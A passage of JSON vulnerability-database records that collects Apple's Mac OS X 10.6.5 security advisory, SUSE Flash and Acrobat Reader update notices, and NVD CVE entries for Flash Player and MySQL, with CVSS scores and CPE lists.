Description: An unitialized memory access issue exists in QuickTime&#39;s handling of GIF images. Viewing a maliciously crafted GIF image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. Credit to an anonymous researcher working with TippingPoint&#39;s Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n Safari RSS\r\n\r\n CVE-ID: CVE-2010-3796\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Accessing a maliciously crafted &quot;feed:&quot; URL may lead to the disclosure of sensitive information\r\n\r\n Description: Java applets are allowed in RSS feeds. Since Java applets can modify the loading DOM, accessing a maliciously crafted &quot;feed:&quot; URL may lead to the disclosure of sensitive information. This issue is addressed by disallowing Java applets in RSS feeds. Credit to Jason Hullinger of IOActive for reporting this issue.\r\n\r\n *\r\n\r\n Time Machine\r\n\r\n CVE-ID: CVE-2010-1803\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may access a user&#39;s Time Machine information\r\n\r\n Description: The user may designate a remote AFP volume to be used for Time Machine backups. Time Machine does not verify that the same physical device is being used for subsequent backup operations. An attacker who is able to spoof the remote AFP volume can gain access to the user&#39;s backup information. This issue is addressed by verifying the unique identifier associated with a disk for backup operations. This issue does not affect Mac OS X v10.5 systems. Credit to Renaud Deraison of Tenable Network Security, Inc. for reporting this issue.\r\n\r\n *\r\n\r\n Wiki Server\r\n\r\n CVE-ID: CVE-2010-3797\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A user who can edit wiki pages may obtain the credentials of other users\r\n\r\n Description: A JavaScript injection issue exists in Wiki Server. A user who can edit wiki pages may obtain the credentials of any user who visits the edited pages. This issue is addressed through improved input validation. This issue only affects Mac OS X Server systems. Credit: Apple.\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2010-1205, CVE-2010-2249, CVE-2010-0205\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in libpng version 1.2.41\r\n\r\n Description: Multiple vulnerabilities exist in libpng version 1.2.42, the most serious of which may lead to arbitrary code execution. These issues are addressed by updating to version 1.2.44. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2009-0946, CVE-2010-2497, CVE-2010-2498, CVE-2010-2499, CVE-2010-2500, CVE-2010-2519, CVE-2010-2520, CVE-2010-2805, CVE-2010-2806, CVE-2010-2807, CVE-2010-2808, CVE-2010-3053, CVE-2010-3054\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in FreeType 2.3.9\r\n\r\n Description: Multiple vulnerabilities exist in FreeType 2.3.9, the most serious of which may lead to arbitrary code execution when processing a maliciously crafted font. These issues are addressed by updating FreeType to version 2.4.2. Further information is available via the FreeType site at http://www.freetype.org/\r\n\r\n *\r\n\r\n xar\r\n\r\n CVE-ID: CVE-2010-3798\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Extracting a maliciously crafted xar archive may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in xar. Extracting a maliciously crafted xar archive may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit: Apple.\r\n\r\n", "edition": 1, "modified": "2010-11-18T00:00:00", "published": "2010-11-18T00:00:00", "id": "SECURITYVULNS:DOC:25153", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25153", "title": "About the security content of Mac OS X v10.6.5 and Security Update 2010-007", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:19:55", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3651", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "Adobe Flash Player was updated to version 10.1.102.64 to fix a critical security issue.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-11-05T13:12:10", "published": "2010-11-05T13:12:10", "id": "SUSE-SA:2010:055", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-11/msg00002.html", "title": "remote code execution in flash-player", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:18:58", "bulletinFamily": "unix", "cvelist": ["CVE-2010-4091", "CVE-2010-3654"], "description": "Specially crafted PDF documents could crash acroread or lead to execution of arbitrary code. acroread was updated to version 9.4.1 which addresses the issues.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-12-08T17:17:01", "published": "2010-12-08T17:17:01", "id": "SUSE-SA:2010:058", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-12/msg00001.html", "title": "remote code execution in acoread", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2020-12-09T19:34:43", "description": "Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.", "edition": 6, "cvss3": {}, "published": "2010-11-07T22:00:00", "title": "CVE-2010-3644", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3644"], "modified": "2019-10-09T23:01:00", "cpe": ["cpe:/a:adobe:flash_player:10.1.95.1"], "id": "CVE-2010-3644", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3644", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:10.1.95.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:43", "description": "Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.", "edition": 6, "cvss3": {}, "published": "2010-11-07T22:00:00", "title": "CVE-2010-3642", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3642"], "modified": "2019-10-09T23:01:00", "cpe": ["cpe:/a:adobe:flash_player:10.1.95.1"], "id": "CVE-2010-3642", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3642", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:10.1.95.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:43", "description": "Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3650, and CVE-2010-3652.", "edition": 6, "cvss3": {}, "published": "2010-11-07T22:00:00", "title": "CVE-2010-3649", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3649"], "modified": "2019-10-09T23:01:00", "cpe": ["cpe:/a:adobe:flash_player:10.1.95.1"], "id": "CVE-2010-3649", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3649", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:10.1.95.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:57:29", "description": "storage/innobase/dict/dict0crea.c in mysqld in Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (assertion failure) by modifying the (1) innodb_file_format or (2) innodb_file_per_table configuration parameters for the InnoDB storage engine, then executing a DDL statement.", "edition": 4, "cvss3": {}, "published": "2011-01-11T20:00:00", "title": "CVE-2010-3676", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3676"], "modified": "2019-12-17T20:23:00", "cpe": ["cpe:/a:oracle:mysql:5.1.44", "cpe:/a:mysql:mysql:5.1.34", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:oracle:mysql:5.1.13", "cpe:/a:oracle:mysql:5.1.28", "cpe:/a:oracle:mysql:5.1.40", "cpe:/a:oracle:mysql:5.1.17", "cpe:/a:oracle:mysql:5.1.30", "cpe:/a:oracle:mysql:5.1.21", "cpe:/a:oracle:mysql:5.1.36", "cpe:/a:oracle:mysql:5.1", "cpe:/a:oracle:mysql:5.1.16", "cpe:/a:oracle:mysql:5.1.48", "cpe:/a:mysql:mysql:5.1.31", "cpe:/a:oracle:mysql:5.1.24", "cpe:/a:oracle:mysql:5.1.29", "cpe:/a:oracle:mysql:5.1.37", "cpe:/a:oracle:mysql:5.1.3", "cpe:/a:mysql:mysql:5.1.37", "cpe:/a:oracle:mysql:5.1.27", "cpe:/a:oracle:mysql:5.1.8", "cpe:/a:oracle:mysql:5.1.11", "cpe:/a:oracle:mysql:5.1.38", "cpe:/a:oracle:mysql:5.1.25", "cpe:/a:oracle:mysql:5.1.35", "cpe:/a:oracle:mysql:5.1.14", "cpe:/a:oracle:mysql:5.1.1", "cpe:/a:oracle:mysql:5.1.2", "cpe:/a:oracle:mysql:5.1.4", "cpe:/a:oracle:mysql:5.1.18", "cpe:/a:oracle:mysql:5.1.10", "cpe:/a:oracle:mysql:5.1.12", "cpe:/a:oracle:mysql:5.1.39", "cpe:/a:oracle:mysql:5.1.42", "cpe:/a:oracle:mysql:5.1.34", "cpe:/a:oracle:mysql:5.1.22", "cpe:/a:mysql:mysql:5.1.32", "cpe:/a:oracle:mysql:5.1.26", "cpe:/a:oracle:mysql:5.1.43", "cpe:/a:oracle:mysql:5.1.19", "cpe:/a:oracle:mysql:5.1.9", "cpe:/a:oracle:mysql:5.1.45", "cpe:/a:oracle:mysql:5.1.41", "cpe:/a:oracle:mysql:5.1.15", "cpe:/a:oracle:mysql:5.1.47", "cpe:/a:oracle:mysql:5.1.33", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:oracle:mysql:5.1.6", "cpe:/a:oracle:mysql:5.1.23", "cpe:/a:oracle:mysql:5.1.46", "cpe:/a:oracle:mysql:5.1.20", "cpe:/a:oracle:mysql:5.1.7", "cpe:/a:oracle:mysql:5.1.31"], "id": "CVE-2010-3676", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3676", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:mysql:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.43:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.30:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.25:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.33:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.27:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.34:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.39:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.44:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.38:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.46:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.42:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.45:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.36:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.23:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.40:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.28:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.37:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.48:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.34:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.43:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.41:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.21:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.31:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.26:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.23:a:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.24:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.47:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.32:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.46:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.40:sp1:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.31:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.37:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.29:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.35:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.15:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:43", "description": "Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.", "edition": 6, "cvss3": {}, "published": "2010-11-07T22:00:00", "title": "CVE-2010-3643", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3643"], "modified": "2019-10-09T23:01:00", "cpe": ["cpe:/a:adobe:flash_player:10.1.95.1"], "id": "CVE-2010-3643", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3643", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:10.1.95.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:43", "description": "Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.", "edition": 6, "cvss3": {}, "published": "2010-11-07T22:00:00", "title": "CVE-2010-3645", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3645"], "modified": "2019-10-09T23:01:00", "cpe": ["cpe:/a:adobe:flash_player:10.1.95.1"], "id": "CVE-2010-3645", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3645", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:10.1.95.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:43", "description": "Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris and 10.1.95.1 on Android, and authplay.dll (aka AuthPlayLib.bundle or libauthplay.so.0.0.0) in Adobe Reader and Acrobat 9.x through 9.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted SWF content, as exploited in the wild in October 2010.", "edition": 5, "cvss3": {}, "published": "2010-10-29T19:00:00", "title": "CVE-2010-3654", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3654"], "modified": "2017-09-19T01:31:00", "cpe": ["cpe:/a:adobe:flash_player:8.0.42.0", "cpe:/a:adobe:acrobat_reader:9.1.3", "cpe:/a:adobe:acrobat:9.1", "cpe:/a:adobe:acrobat:9.3.2", "cpe:/a:adobe:flash_player:9.0.152.0", "cpe:/a:adobe:flash_player:10.0.42.34", "cpe:/a:adobe:acrobat:9.3", "cpe:/a:adobe:flash_player:8.0.24.0", "cpe:/a:adobe:flash_player:9.0.31", "cpe:/a:adobe:acrobat_reader:9.3.1", "cpe:/a:adobe:flash_player:10.1.92.10", "cpe:/a:adobe:acrobat:9.1.1", "cpe:/a:adobe:flash_player:9.0.31.0", "cpe:/a:adobe:acrobat:9.3.3", "cpe:/a:adobe:acrobat_reader:9.3.2", "cpe:/a:adobe:acrobat:9.0", "cpe:/a:adobe:flash_player:7.0.1", "cpe:/a:adobe:flash_player:10.0.45.2", "cpe:/a:adobe:flash_player:8.0.39.0", "cpe:/a:adobe:acrobat_reader:9.3", "cpe:/a:adobe:flash_player:9.0.112.0", "cpe:/a:adobe:flash_player:9.0.20", "cpe:/a:adobe:flash_player:8.0.35.0", "cpe:/a:adobe:flash_player:9.0.18d60", "cpe:/a:adobe:acrobat:9.4", "cpe:/a:macromedia:flash_player:6.0.29.0", "cpe:/a:adobe:flash_player:7.0.70.0", "cpe:/a:adobe:flash_player:7.1.1", "cpe:/a:adobe:flash_player:8.0.33.0", "cpe:/a:adobe:flash_player:9.0.16", "cpe:/a:adobe:acrobat:9.2", "cpe:/a:adobe:flash_player:10.0.32.18", "cpe:/a:adobe:flash_player:7.1", "cpe:/a:adobe:flash_player:9.0.124.0", "cpe:/a:adobe:acrobat:9.1.2", "cpe:/a:macromedia:flash_player:6.0.79.0", "cpe:/a:adobe:acrobat_reader:9.3.3", "cpe:/a:adobe:flash_player:10.1.53.64", "cpe:/a:adobe:acrobat:9.1.3", "cpe:/a:adobe:flash_player:7.0.69.0", "cpe:/a:adobe:flash_player:10.0.22.87", "cpe:/a:adobe:acrobat_reader:9.3.4", "cpe:/a:adobe:acrobat_reader:9.2", "cpe:/a:adobe:flash_player:10.1.82.76", "cpe:/a:adobe:acrobat_reader:9.4", "cpe:/a:adobe:flash_player:9.125.0", "cpe:/a:macromedia:flash_player:5.0", "cpe:/a:adobe:flash_player:10.1.85.3", "cpe:/a:adobe:acrobat_reader:9.0", "cpe:/a:adobe:flash_player:7.2", "cpe:/a:adobe:flash_player:10.0.12.36", "cpe:/a:adobe:flash_player:9.0.47.0", "cpe:/a:adobe:flash_player:8.0.34.0", "cpe:/a:adobe:flash_player:9.0.151.0", "cpe:/a:adobe:flash_player:9.0.48.0", "cpe:/a:adobe:flash_player:10.1.92.8", "cpe:/a:adobe:flash_player:6.0.79", "cpe:/a:adobe:flash_player:9.0.115.0", "cpe:/a:adobe:flash_player:9.0.28.0", "cpe:/a:macromedia:flash_player:6.0.47.0", "cpe:/a:adobe:flash_player:10.1.52.15", "cpe:/a:adobe:acrobat_reader:9.1.1", "cpe:/a:adobe:flash_player:9.0.28", "cpe:/a:adobe:flash_player:8.0.22.0", "cpe:/a:adobe:flash_player:8.0", "cpe:/a:adobe:flash_player:9.0.246.0", "cpe:/a:macromedia:flash_player:6.0.65.0", "cpe:/a:adobe:flash_player:7.0.63", "cpe:/a:adobe:acrobat_reader:9.1", "cpe:/a:adobe:acrobat_reader:9.1.2", "cpe:/a:adobe:flash_player:10.0.15.3", "cpe:/a:adobe:flash_player:9.0.125.0", "cpe:/a:adobe:flash_player:9.0.20.0", "cpe:/a:adobe:flash_player:7.0.25", "cpe:/a:adobe:flash_player:9.0.114.0", "cpe:/a:adobe:flash_player:6.0.21.0", "cpe:/a:adobe:flash_player:10.0.0.584", "cpe:/a:adobe:flash_player:10.0.12.10", "cpe:/a:adobe:flash_player:9.0.260.0", "cpe:/a:macromedia:flash_player:5.0_r50", "cpe:/a:adobe:flash_player:7.0", "cpe:/a:adobe:flash_player:9.0.45.0", "cpe:/a:adobe:flash_player:10.1.52.14.1", "cpe:/a:adobe:acrobat:9.3.1", "cpe:/a:adobe:acrobat:9.3.4", "cpe:/a:adobe:flash_player:10.1.95.2", "cpe:/a:macromedia:flash_player:6.0", "cpe:/a:macromedia:flash_player:6.0.40.0", "cpe:/a:adobe:flash_player:9.0.159.0"], "id": "CVE-2010-3654", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3654", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:10.0.0.584:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.70.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.260.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.115.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.159.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:6.0.79:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.47.0:*:*:*:*:*:*:*", "cpe:2.3:a:macromedia:flash_player:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:macromedia:flash_player:5.0_r50:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.112.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.95.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.39.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.2:*:*:*:*:*:*:*", 